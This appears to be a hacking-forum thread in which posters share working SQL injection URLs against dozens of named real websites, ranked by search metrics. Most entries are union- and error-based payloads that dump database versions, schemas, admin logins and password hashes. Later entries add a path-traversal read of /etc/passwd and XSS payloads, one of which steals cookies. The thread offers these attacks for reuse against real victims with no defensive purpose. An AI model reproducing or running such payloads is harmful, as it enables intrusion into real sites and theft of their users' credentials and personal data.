Code:
http://stitch.kh.ua/index.php?section=products&action=list&category=49%20and%20%28select%20count%28*%29%20from%20%28select%201%20union%20select%202%20union%20select%203%29x%20group%20by%20concat%28%28%20Select%20COLUMN_NAME%20FROM%20information_schema.COLUMNS%20WHERE%20TABLE_NAME=0x75736572%20and%20TABLE_SCHEMA=0x7374697463685f73686f70%20%20limit%200,1%29,floor%28rand%280%29*2%29%29%29%23
Admin panel: /admin
CMS MIB 2008
Branch 5.0.51a-24+lenny2-log, DB stitch_shop, user stitch@localhost, server debian-linux-gnu
columns user idс login password userid usergroupid membergroupids displaygroupid username password passworddate email1 styleid parentemail1 homepage icq aim yahoo1...
DBs: information_schema belson rpo_itstep_forum stitch?shop stitch_forum stitch_oscommerce stitch_shop

Code:
http://hsr.kh.ua/services/main/index.php?go=index-2&type=2%20and%200%20union%20select%20111111111111%23&add=index22

Code:
http://www.news2news.com/vfp/?group=13+and+5=@@version--+&=0&PHPSESSID=a8c7ba850a36c4fceef6149ec16a7424 -> true
http://www.news2news.com/vfp/?group=13+and+4=@@version--+&=0&PHPSESSID=a8c7ba850a36c4fceef6149ec16a7424 -> false
www.news2news.com: it already has errors everywhere, even without injections.
Code:
http://www.imaginenative.org/gallery_preview.php?id=24&y=99%27%20+%20and%201=%28select%20count%28*%29%20from%20%28select%201%20union%20select%202%20union%20select%203%29x%20group%20by%20concat%28version%28%29,floor%28rand%280%29*2%29%29%29--+
Duplicate entry '5.0.851' for key 1
portbld-freebsd7.21
columns table login: login_fname login_lname username password
columns table clients: id client_role client_contact_first_name client_contact_last_name client_aboriginal client_indigenous_affiliation lient_company_name client_street client_city client_province client_postalcode client_country client_phone_type client_phone_country_code client_phone client_phone_ext client_phone_type client_fax client_email client_web client_artist_bio client_artist_other_works client_ts client_call_id client_address_type lient_address_unit client_street_Part2 client_main_contact client_phone1_area_code client_phone1_part_one client_phone1_part_two client_phone2_area_code client_phone2_part_one client_phone2_part_two client_fax_area_code client_fax_part_one

Code:
http://www.abbeyfield.ca/story.php?aid=54+union+select+1,2,3,4,5,6,7--+
db481269@localhost
information_schema:db481269
house_info
id:society_name:house_name:location:city:founded:capacity:contact:contact_phone:contact_email:cost:website:in

Code:
http://www.sierra.ca/news.php?id=25%20and%200%20union%20select%201,GROUP_CONCAT%28SCHEMA_NAME%20SEPARATOR%20%27:%27%29,3,4,5,6,7%20FROM%20information_schema.SCHEMATA--+
Code:
http://mercury.odessa.ua/details/32664%20union%20select%201,2,3,concat_ws%280x3a,version%28%29,database%28%29,user%28%29,@@version_compile_os%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28%23/
5.0.45:AllOde:WebSite@localhost:redhat-linux-gnu
DBs: information_schema:AllOde:Evgen:dbwap:jom_:luzanovka_db:mysqlds17
PosOut:anketa:banners:extr:groups:job_rel:klvidjob:kodsng:kodukr:kodword:link_anketa:marshrut:message:navigator:newseoplehoneosin:rubricator:street:struode:tamoj:txtvals:user_info:vlastukr
user_info
id_user:name_userass_user:copy_password:mail_user:icq_userhone_user:url_user:city_user:firm_user:info_user

Code:
http://mercury.odessa.ua/details/32664 union select 1,2,3,concat_ws(0x3a,name_user,pass_user),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 FROM user_info limit 0,1/

Code:
http://mercury.odessa.ua/details/32664%20union%20select%201,2,3,aes_decrypt%28aes_encrypt%28pass_user,1%29,1%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28%20FROM%20user_info%20limit%201,1/

http://turniere.govb.de/bbc/ - pr0 here, while here it is already http://turniere.govb.de pr4 and TIC 10
Through the error we learn the table prefix from the schema: it is bbc_
Pulling the first admin's data:
Code:
http://turniere.govb.de/bbc/e107_plugins/registration/playerlist.php?order=1,%28select%20count%28*%29%20from%20%28select%201%20union%20select%202%20union%20select%203%29x%20group%20by%20concat%28%28select%20user_loginname%20from%20bbc_user%20limit%200,1%29,0x3a,%28select%20user_password%20from%20bbc_user%20limit%200,1%29,0x3a,floor%28rand%280%29*2%29%29%29
The password is complex.
Pulling the second admin:
Code:
http://turniere.govb.de/bbc/e107_plugins/registration/playerlist.php?order=1,%28select%20count%28*%29%20from%20%28select%201%20union%20select%202%20union%20select%203%29x%20group%20by%20concat%28%28select%20user_loginname%20from%20bbc_user%20where%20user_admin=1%20limit%201,1%29,0x3a,%28select%20user_password%20from%20bbc_user%20limit%201,1%29,0x3a,floor%28rand%280%29*2%29%29%29
The password is easily brute-forceable. But there are no privileges in the admin panel; no shell uploaded.

pr3
Code:
http://psphungary.hu/e107_plugins/nboard/nboard.php?cat=1%29%20and%201=%28select%201%20from%20%28select%20count%28*%29%20from%20%28select%201%20union%20select%202%20union%20select%203%29x%20group%20by%20concat%28%28select%20%20concat_ws%280x3a,user_loginname,user_password%29%20from%20e107_user%20limit%200,1%29,0x3a,floor%28rand%280%29*2%29%29%29y%29--+
The admin panel is different; no shell uploaded.

pr2
Code:
http://www.kirovfishing.ru/e107_plugins/nboard/nboard.php?cat=1) and 1=(select 1 from (select count(*) from (select 1 union select 2 union select 3)x group by concat((select concat_ws(0x3a,user_loginname,user_password) from e107_user limit 0,1),0x3a,floor(rand(0)*2)))y)--+
No privileges; no shell uploaded.

pr1
Code:
http://bagazniki.com.ua/index.php?id=688+and+%28select%20count%28*%29%20from%20%28select%201%20union%20select%202%20union%20select%203%29x%20group%20by%20concat%28version%28%29,floor%28rand%280%29*2%29%29%29

pr4
Code:
http://www.pogoda.ua/index.php?id=4+and+0+union+select+1,concat_ws%280x3a,login,password%29,3,4,5+from+users+limit+0,1--+

pr3 => the gays made me convert to the required encoding
Code:
http://www.menoboy.com/repertoire-videos-gays/extrait-video-gay.php?id=269+union+select+1,2,3,4,5,6,7,unhex%28hex%28concat_ws%280x3a,version%28%29,user%28%29,database%28%29,@@version_compile_os%29%29%29,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43--+
4.1.11:db1@localhost:db1:mandrake-linux-gnu
Sorry, this may be a repost; no time to check.
Code:
http://mexco.ru/ind.php?pn=0&id_categ=-47+union+select+1,2,3,4,5,6,concat_ws(0x3a,version(),database(),user()),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23--+
5.0.77-log:gecto756_mexco:gecto756_mexco@localhost
TIC 20, PageRank 2
Admin panel: http://mexco.ru/Admin/
P.S. Look for the fields yourselves))

Code:
http://kaktak.net/dosk/ind.php?pn=1&id_categ=-15+union+select+1,2,3,4,5,6,concat_ws(0x3a,version(),database(),user()),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23--+
5.0.67-community:sdelka5_kaktak:sdelka5_sdelka5@localhost
TIC 150, PageRank 1
http://www.travelwheel.ru/runs/foto4.php?id=-1469+union+select+1,2,3,4,5,6,version(),8+--+
TIC: 10 PR: 2
http://www.jks2000.ru/index.php?id=33+'+union+select+1,2,3,version(),5,6+--+
TIC: 20 PR: 2
http://akmeo.rus.net/index.php?id=119+union+select+1+--+
TIC: 50
http://www.piter-print.ru/index.php?id=3'
TIC: 20
http://www.mwis.org.uk/webcams.php?cam=-15+union+select+1,2,version(),4,5,6--
http://www.aact.org.gh/newsite/pages/press/index.php?id=-10'+union+select+1,2,3,4,unhex(hex(version())),6+order+by+'4
http://www.online.scouting.org.za/calendar/eventdisplay.php?id=-766+union+select+1,2,version()--
Code:
http://www.scotish.ru/board/ind.php?pn=2&id_categ=-42+union+select+1,2,3,4,5,6,concat_ws(0x3a,version(),database(),user()),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23--+
4.1.22-standard-log:scotish_board:scotish_admin@localhost
TIC 10, PageRank 2

Code:
http://www.fazendeiro.ru/board/ind.php?pn=1&id_categ=-31+union+select+1,2,3,4,5,concat_ws(0x3a,version(),database(),user()),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+--+
5.1.45:db1708c:[email protected]

Code:
http://www.fazendeiro.ru/board/ind.php?pn=1&id_categ=-31+union+select+1,2,3,4,5,group_concat(column_name),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=0x70687062625f7573657273+--+

Code:
http://www.fazendeiro.ru/board/ind.php?pn=1&id_categ=-31+union+select+1,2,3,4,5,username,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+FROM+phpbb_users+--+
TIC 50
http://www.lankapetlovers.com/petInfo_details.php?infoId=-2510+union+select+1,2,concat(username,char(58),password),4+from+users
http://bazar-auto.ru/board/ind.php?pn=1&id_categ=1+and+1=0+ Union Select UNHEX(HEX([visible])) ,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20
PR:5 TIC:160
http://www.hajosalfred.hu/eng/flow.php?id=-6+union+select+1,2,concat_ws(0x3a,version(),database(),user(),@@version_compile_os)--
http://www.helpersofmary.org/community.php?id=-17+union+select+1,2,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),4,5,6,7,8,9,10,11--
http://www.collinsbuilders.net/community.php?id=-20+union+select+1,2,3,4--
http://www.wentworthseniorliving.com/wentworth/community.php?id=-2+union+select+1,2,3,4,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23--
http://www.goxgo.ca/community.php?id=-11+union+select+1,2,3,4,5,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),7,8,9,10,11--
http://www.helpersofmary.org/community.php?id=-51+union+select+1,2,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),4,5,6,7,8,9,10,11--
What you posted can hardly be called an injection; a query for your case should have looked roughly like this:
Code:
http://bazar-auto.ru/board/ind.php?pn=1&id_categ=-1+union+select+1,2,3,4,5,concat(login,char(58),password),7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+tbl_admin_users+--+
Municipal website of the city of Alushta
http://www.alushta.crimea.ua/rest/type_rest.php?type=-1+and+1=2+union+all+select+concat_ws(0x3a,login,password,email),2,3,4,5,6,7,8,9,10+from+users--
http://www.romenewsbywatson.com/inside.php?id=-62+UnIon+selECt+1,2,3,4,5,concat_ws(0x3a,username,password),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+adminusers+--+
PR: 3
http://www.bhcc.mass.edu/inside/inside.php?navID=132&id=257'+UnIon+selECt+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16+--+
TIC: 10
http://www.finger-lakes-tours.com/inside.php?id=-167'+UnIon+selECt+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17+--+
http://www.awrad.org/einside.php?id=-4+union+select+1,2,3,4,5+--+
http://www.artspace.org.au/gallery_project.php?i=132+union+select+1,2,3,4,5,version%28%29,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24--
My first one) posted here
http://www.vpole.ru/press/?id=-1741+union+select+1,2,concat_ws%280x3a,user,passwd%29,4,5,6,7+from+users+limit+0,1--+
TIC: 375 PR: 5
http://tatalc.ru/tatalc2/?pg=3&bl=1&md=2&iddoc=-17499'+UnIon+selECt+1,2,3,4,5,concat_ws(0x3a,login,passwd),7,8,9,10,11,12,13,14,15,16,17,18,19+from+access_users+limit+0,1--+
TIC: 350
1.5k hashes in a single request))
http://bomond.net.ua/my/compare.php?id=131269+and+1=0+union+select+1,concat(@i:=0x00,@o:=0x0d0a,benchmark(1500,@o :=CONCAT(@o,0x0d0a,(SELECT concat(@i:=customers_password) from bomondlg_bomondshop.customers WHERE customers_password >@i order by customers_password LIMIT 1))),@o)
Remove the spaces where needed...
P.S. Shortened the link - http://is.gd/eNo1p
Best opened in FF
http://www.clean-up.ru/cat.php?id=-511+union+select+group_concat%28table_name%29,2,3,4,5,6+from+information_schema.tables--+
TIC: 20
Table admin: username,PASSWORD
http://www.rzeczna.pl/lineage.php?id=-8+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75+--+
SQL Injection
http://mec1rgqh.panontrade.com/offers.php?id=885+and+1=0+union+select+1,2,3,4,5,6,group_concat(es_admin_name,char(58),es_pwd),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+esb2b_admin&file=Products&prod=sell&uid=mec1rgqh

File reader: log in to the admin panel (http://panontrade.com/admin)
http://panontrade.com/admin/manage_pages.php?curr_page=passwd&curr_subdir=../../../../../../../../../../etc

XSS
And of course XSS: at http://panontrade.com, in the search field enter "><script>alert()</script>
And one more XSS in the admin panel: at http://panontrade.com/admin/edit_link.php, in the Contact Person field enter "><script>alert(document.cookie)</script>
http://ugc.sollies.free.fr/joo154/m/un.php?id=-472+union+select+TABLE_NAME,2,3,4,5,6+FROM+INFORMATION_SCHEMA.TABLES--
http://www.unostra.com/union.php?id=-12+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14--
http://www.thailabordatabase.org/en/union.php?c=detail&id=-1312+union+select+1,2,3,4,5,database(),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55--
http://www.unionradioirun.com/union.php?s=pro&s2=&pag=1&id=-197+union+select+database()--